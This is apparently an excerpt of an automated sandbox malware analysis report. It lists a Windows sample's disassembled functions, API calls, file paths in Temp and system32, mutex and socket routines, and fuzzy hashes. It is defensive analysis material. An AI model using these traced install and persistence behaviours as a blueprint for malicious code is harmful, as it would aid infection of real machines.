                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$connecthtonslstrcpyrecvselectsendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: 0$chunked$content-length$transfer-encoding
                                                                                                                                                                                                                                                      • API String ID: 1838493728-40983872
                                                                                                                                                                                                                                                      • Opcode ID: 235dea8b46d4ee2d5438c381730252cc5b057c6fc41e740b7cc2ad439a5dfb9d
                                                                                                                                                                                                                                                      • Instruction ID: 40cfbdb6b8a0f10b890aa6bab67d98a43da17613289cd9da5c7ab6e3ab63f530
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 235dea8b46d4ee2d5438c381730252cc5b057c6fc41e740b7cc2ad439a5dfb9d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEB18A71500208AFEF21DF64DC44BEA77A9FB04704F5040BAF905E6192DB79AA89CF65

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1411 40da5b-40da7a InitializeCriticalSection 1412 40da7c 1411->1412 1413 40da7f-40da85 1411->1413 1412->1413 1414 40dac0-40daee SetErrorMode call 408d16 1413->1414 1415 40da87 1413->1415 1422 40daf4-40db26 GetSystemDirectoryA lstrcatA call 414bf8 call 40c0b1 call 40d4a9 1414->1422 1423 40dcae-40dcb4 1414->1423 1417 40da8a-40da8d 1415->1417 1418 40da89 1417->1418 1419 40da8f-40da94 1417->1419 1418->1417 1421 40da99-40daa4 call 413761 1419->1421 1428 40da96 1421->1428 1429 40daa6-40dab8 call 413761 1421->1429 1437 40dba3-40dbad call 40c54e 1422->1437 1438 40db28-40db2c 1422->1438 1428->1421 1429->1414 1436 40daba-40dabd 1429->1436 1436->1414 1437->1423 1447 40dbb3-40dbb5 1437->1447 1439 40db79-40db7b 1438->1439 1440 40db2e-40db31 call 40c54e 1438->1440 1439->1437 1442 40db7d-40db87 call 40c54e 1439->1442 1446 40db36-40db39 1440->1446 1442->1423 1453 40db8d-40db94 1442->1453 1449 40db5b-40db65 call 40c54e 1446->1449 1450 40db3b-40db44 1446->1450 1451 40dbb7-40dbcb lstrcpyA call 40d59d 1447->1451 1452 40dbcc 1447->1452 1449->1423 1463 40db6b-40db75 1449->1463 1454 40db52-40db59 1450->1454 1455 40db46-40db4c lstrcpyA 1450->1455 1451->1452 1458 40dbd3-40dbdd call 40a949 call 40d7d0 1452->1458 1459 40db95-40dba1 lstrcpyA 1453->1459 1454->1458 1455->1454 1468 40dbe9-40dbf0 call 40d4e2 1458->1468 1459->1452 1463->1452 1466 40db77 1463->1466 1466->1459 1471 40dbf2-40dc58 WSAStartup InitializeCriticalSection * 11 1468->1471 1472 40dbdf-40dbe4 call 413df9 call 413dd8 1468->1472 1474 40dc70-40dc9f call 40d158 call 40c7e0 CreateThread * 2 1471->1474 1475 40dc5a-40dc61 call 40d2ec 1471->1475 1472->1468 1488 40dca1 call 410a09 1474->1488 1489 40dca6 call 40c6a0 1474->1489 1483 40dc63-40dc6a call 40c4ce 1475->1483 1484 40dc6b call 410b43 1475->1484 1483->1484 1484->1474 1488->1489 1493 40dcab 1489->1493 1493->1423
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00458D80,76AF0A60,00000000), ref: 0040DA72
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00008003), ref: 0040DAC5
                                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00000104), ref: 0040DAFF
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Windows\system32\,0042A3B0), ref: 0040DB0B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000001), ref: 0040DB4C
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000001), ref: 0040DB9B
                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 0040DBFE
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0044F7B8), ref: 0040DC09
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0044F79C), ref: 0040DC10
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00459708), ref: 0040DC17
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045983C), ref: 0040DC1E
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0044F7E0), ref: 0040DC25
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00459674), ref: 0040DC2C
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596EC), ref: 0040DC33
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596D4), ref: 0040DC3A
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596BC), ref: 0040DC41
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(004596A4), ref: 0040DC48
                                                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(0045968C), ref: 0040DC4F
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 0040C591
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: CreateMutexA.KERNEL32(00000000,00000001,00000000), ref: 0040C5A7
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: GetLastError.KERNEL32 ref: 0040C5AF
                                                                                                                                                                                                                                                        • Part of subcall function 0040C54E: CloseHandle.KERNEL32(00000000), ref: 0040C5BA
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040C431,00000000,00000000,00000000), ref: 0040DC8A
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040D1D8,00000000,00000000,00000000), ref: 0040DC96
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalInitializeSection$Create$ErrorMutexThreadlstrcpy$CloseDirectoryHandleLastModeOpenStartupSystemlstrcat
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3287937100-2541385624
                                                                                                                                                                                                                                                      • Opcode ID: 1d8fa31ad52112eeba318bed8d9aa085e5bcca949472bfe77bc0c11535e98c15
                                                                                                                                                                                                                                                      • Instruction ID: 4a85369abd0a2a9a89e7fd51754485e40c171d24ce782e2c1052b94615d691b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d8fa31ad52112eeba318bed8d9aa085e5bcca949472bfe77bc0c11535e98c15
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF518D71A44254AAEA217BF56C46FAB3A589F4175AF25003BFC41311C38ABC5C4ECA7F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E4B
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E52
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E5C
                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000104,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00413E75
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E81
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000,0040D80A), ref: 00413E88
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F77
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000006,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000,?,00000000), ref: 00413F82
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\, xrefs: 00413E3C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$ProcessToken$AttributesCloseCurrentFileHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\
                                                                                                                                                                                                                                                      • API String ID: 3498935171-1812980290
                                                                                                                                                                                                                                                      • Opcode ID: ae00fb54b3492c3a0ace82967610d98ed381333d34f1cc31c124c4b0d0481274
                                                                                                                                                                                                                                                      • Instruction ID: 790f76d0c7c029a87acee6e2e27f50b46b65660552c2eddc99154039eeec75a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae00fb54b3492c3a0ace82967610d98ed381333d34f1cc31c124c4b0d0481274
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC411B71E00218BBDB209FA1ED4DEEE7FBCEB44705F50006AF901E2160DB749A56DB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00413FA3
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00413FAA
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413FB4
                                                                                                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,.exe), ref: 00413FD1
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413FD9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413FE0
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004140BE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                                      • API String ID: 3182025614-4119554291
                                                                                                                                                                                                                                                      • Opcode ID: 1de395bec982ee16d1ba774764177e0ec6cf3ca332c2e473e0865e044f3a2139
                                                                                                                                                                                                                                                      • Instruction ID: a25941590cff0d4bff0b9fb00928191c2ec88986d9cc0e69d77e81c5d1198593
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de395bec982ee16d1ba774764177e0ec6cf3ca332c2e473e0865e044f3a2139
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92315071A00218BBDF209FE1DC48FDE7B7CEF08744F540066F605E2160DB7999959B69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 0040D21B
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040D223
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040D254
                                                                                                                                                                                                                                                        • Part of subcall function 00414D8E: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0040D2A9,00000000), ref: 00414DA4
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D22A
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040D276
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0040D27E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D285
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 0040D29D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D2B6
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D2CA
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D2D5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 0040D2E4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$CountTicklstrlen$lstrcpy$CreateFileSleep
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 157799668-577769959
                                                                                                                                                                                                                                                      • Opcode ID: a14428d9e2af36542f807380719714de05a372dac77148e5a00d34e4d435e05c
                                                                                                                                                                                                                                                      • Instruction ID: 1dd661079137dd266a11f3d998b1c56a89a9d41e77c259510d1bc51e0b0dfb00
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a14428d9e2af36542f807380719714de05a372dac77148e5a00d34e4d435e05c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A21A772504315ABC610FFA0EC4599BB7DCAB84310F11082FF941A3193DA78D95D8BAB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,004596A4,00000000,00000000), ref: 0041046C
                                                                                                                                                                                                                                                        • Part of subcall function 00410335: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76AE83C0,00000000), ref: 00410393
                                                                                                                                                                                                                                                        • Part of subcall function 00410335: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004103A9
                                                                                                                                                                                                                                                        • Part of subcall function 00410335: CloseHandle.KERNEL32(?), ref: 004103B2
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004104B7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004104CD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00410528
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00410583
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,000000F0), ref: 004105CC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004105DE
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004105EE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 00410637
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041064B
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0041062B
                                                                                                                                                                                                                                                      • C:\Windows\system32\, xrefs: 004104AB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$FileHeap$CloseCreateDirectoryFreeHandleProcessReadWindows
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3549376159-2518840955
                                                                                                                                                                                                                                                      • Opcode ID: 5fa5fb7c4babeb1a4571ccf006c53f353e31d714d4b4cfc985645009501d3b2e
                                                                                                                                                                                                                                                      • Instruction ID: d72b5c0f04a7a801b5860cc1153d31a7b218ed3e87dac02d78eebbef0ee0db9c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fa5fb7c4babeb1a4571ccf006c53f353e31d714d4b4cfc985645009501d3b2e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC81E7B2D0021DABDF14DFA4CD859DEB7BCEB08304F1005A6E615E7241EB74AB858FA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 004107DA
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041081D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041084C
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,000000F0), ref: 0041086B
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 0041087D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041088D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004107EE
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: SetFileAttributesA.KERNEL32(00000000,00000080,00000000,76AE8A60,?,?,?,004108D0,?,00000000,?), ref: 004106A5
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?,004108D0,?,00000000,?), ref: 004106B6
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: WriteFile.KERNEL32(00000000,?,004108D0,?,00000000,?,?,004108D0,?,00000000,?), ref: 004106D1
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: CloseHandle.KERNEL32(00000000,?,?,004108D0,?,00000000,?), ref: 004106D8
                                                                                                                                                                                                                                                        • Part of subcall function 0041068A: SetFileAttributesA.KERNEL32(00000000,00000002,?,?,004108D0,?,00000000,?), ref: 004106E3
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 004108AC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 004108C0
